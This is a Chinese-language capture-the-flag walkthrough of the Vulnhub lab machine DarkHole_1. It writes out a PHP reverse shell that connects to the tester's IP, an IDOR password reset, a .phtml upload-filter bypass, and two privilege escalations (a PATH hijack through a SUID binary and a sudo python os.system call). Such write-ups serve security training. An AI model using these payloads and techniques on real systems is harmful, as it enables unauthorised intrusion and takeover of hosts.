Vulnhub 靶机篇:DarkHole_1
## 0x01 靶机信息> - **名称**:DarkHole_1
> - **发布日期**:2021年7月18日
> - **作者**:Jehad Alqurashi
> - **系列**:DarkHole
> - **难度**:简易
> - **简介**:这是一个适合初学者的盒子,但不容易,祝你好运。提示:不要把时间浪费在“蛮力”上
> - **下载链接**:[https://download.vulnhub.com/darkhole/DarkHole.zip](https://download.vulnhub.com/darkhole/DarkHole.zip)
> - **MD5**:19C9D9A6542D363C3185214C90C9D9A3
> - **网络**:DHCP自动分配
## 0x02 Write-Up
### 2.1 主机扫描
目标机IP:192.168.181.162
``` txt
nmap -sS -Pn -p- -A -T4 192.168.181.162
-sS 隐蔽扫描,-Pn 禁Ping,-p- 所有端口,-A 综合扫描,-T4 快速扫描
```
扫描发现开放了22和80端口
!(https://img-oss.hg021b.org/2024/4/5b22484efe8ce5e3bd838c7efe2be904.png)
### 2.2 访问80服务
访问主页,发现view details无反应
!(https://img-oss.hg021b.org/2024/4/35b22265c53d84a30b2320809bb72183.png)
点击login
!(https://img-oss.hg021b.org/2024/4/93bc3c6c8e5ddf3cec5aefd110c4d3ea.png)
万能密码尝试失败,注册一个用户
!(https://img-oss.hg021b.org/2024/4/f9be631b8ba31057abceb3161f028b75.png)
登录后可以看到url有个id=2,是一个尝试的点
!(https://img-oss.hg021b.org/2024/4/c015b13111329a148a1e7e1552589b3c.png)
访问id=1,发现存在内置账户
!(https://img-oss.hg021b.org/2024/4/3b763697cfc2d5948da0d25e99f8ca78.png)
``` txt
Your Not Allowed To Access another user information
你不允许访问其他用户信息
```
#### 2.2.1 越权重置账户密码
尝试密码更改功能
!(https://img-oss.hg021b.org/2024/4/de19ffff8039b283e904e2dc27ad3da8.png)
打开burp抓包
!(https://img-oss.hg021b.org/2024/4/8cb4843f676b83876ce89ed4a4e9131e.png)
可以看到格式是密码跟着id,这里直接更改id=1,发送到repeater模块尝试
发现成功更改
!(https://img-oss.hg021b.org/2024/4/501fc9675f7b1cd660ef83c7b83cd5ee.png)
查看update模块
!(https://img-oss.hg021b.org/2024/4/ab8bba610aa93d835f3d0ccb7f59b029.png)
可以任意修改用户名
!(https://img-oss.hg021b.org/2024/4/6c164e5abbf9f5071dd7cc912c26661c.png)
直接改名admin猜测一下
!(https://img-oss.hg021b.org/2024/4/2718624835d02bc346b5ce31f2f2ec71.png)
提示更改成功,但是依然是user1234
!(https://img-oss.hg021b.org/2024/4/364b657c82c6a4d3c989e089abc77688.png)
这里很可能是用户名重复
使用我们更改的密码1234和用户名admin尝试登录
!(https://img-oss.hg021b.org/2024/4/451045ac17aec4314a5a8cf84f0f3493.png)
登录成功
!(https://img-oss.hg021b.org/2024/4/04fc8888b78bfb3a5ac5bb297bfe9921.png)
#### 2.2.2 文件上传反弹shell
编写反弹shell,并上传
``` php
<?php
$ip = "192.168.181.136";
$port = "4444";
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>
```
!(https://img-oss.hg021b.org/2024/4/1a90564ef99cb0317a2a78a10d554d13.png)
!(https://img-oss.hg021b.org/2024/4/5d0807a801f570d4feebd6e8422db825.png)
上传文件有限制
``` txt
Sorry , Allow Ex : jpg,png,gif
仅允许jpg,png,gif 的扩展名
```
!(https://img-oss.hg021b.org/2024/4/5252986349e8775985c1bc110cc86cd1.png)
更改后缀名为phtml绕过
!(https://img-oss.hg021b.org/2024/4/52e4b0e0de75305e27a9694d5334b306.png)
成功上传
!(1eac64ed6e6d609e63bdb33b66125c8a.png)
开启本地监听
``` nc
nc -nvlp 4444
```
!(https://img-oss.hg021b.org/2024/4/f3a421f9ef5d5492a8b12e780d3bb8ce.png)
点击file执行,反弹成功
!(https://img-oss.hg021b.org/2024/4/e38d00552a48f47858bc7c56ee6ca0d0.png)
#### 2.2.3 会话升级
``` bash
SHELL=/bin/bash script -q /dev/null
```
!(https://img-oss.hg021b.org/2024/4/daa9c24ac780a26a7df3ec8c65ee710f.png)
查找suid权限文件
``` bash
find / -perm -u=s -type f 2> /dev/null
```
发现/home/john/toto可疑文件
!(https://img-oss.hg021b.org/2024/4/76753db622699769d562d2bd6eb1fb17.png)
发现四个文件,其中toto是root权限的可执行文件
!(https://img-oss.hg021b.org/2024/4/955f0c1d5de6a405a9b034aeaf125f63.png)
其余三个文件均无权限
!(https://img-oss.hg021b.org/2024/4/f2696b497abdad2078166463ae0d9303.png)
toto是执行了id命令
!(https://img-oss.hg021b.org/2024/4/eaffd23b8c1ea54513f9dd92a658c5bc.png)
#### 2.2.4 更改环境变量提权
更改id命令的环境,使其运行我们写有自定义内容的id
``` bash
cd /tmp
echo "/bin/bash" > id
chmod + x id
export PATH=/tmp:$PATH
```
!(https://img-oss.hg021b.org/2024/4/b1fec269a2da6908ad7acc06a59240b7.png)
提权成功
!(https://img-oss.hg021b.org/2024/4/85113dfa7cd64af2ec5dd8eab1f6b1ea.png)
获得了user's flag
``` txt
DarkHole{You_Can_DO_It}
```
!(https://img-oss.hg021b.org/2024/4/5b1c28cb83fd58a485c3eb116ddcc1fb.png)
password文件内写有root123,经尝试是john的密码
并且john可以用root权限运行file.py
!(https://img-oss.hg021b.org/2024/4/6cd37420092fe1baa7e08e2ad9109850.png)
#### 2.2.5 python提权
os命令提权
``` python
import os
os.system("/bin/bash")
sudo -u root /usr/bin/python3 /home/john/file.py
```
!(https://img-oss.hg021b.org/2024/4/91afcb75c7d460ce6156f8c1ff925f5a.png)
#### 2.2.6 提权成功
提权成功,root’s flag
``` txt
DarkHole{You_Are_Legend}
```
!(https://img-oss.hg021b.org/2024/4/0e390515c2bdff6cc960c8dac4279524.png)
页:
[1]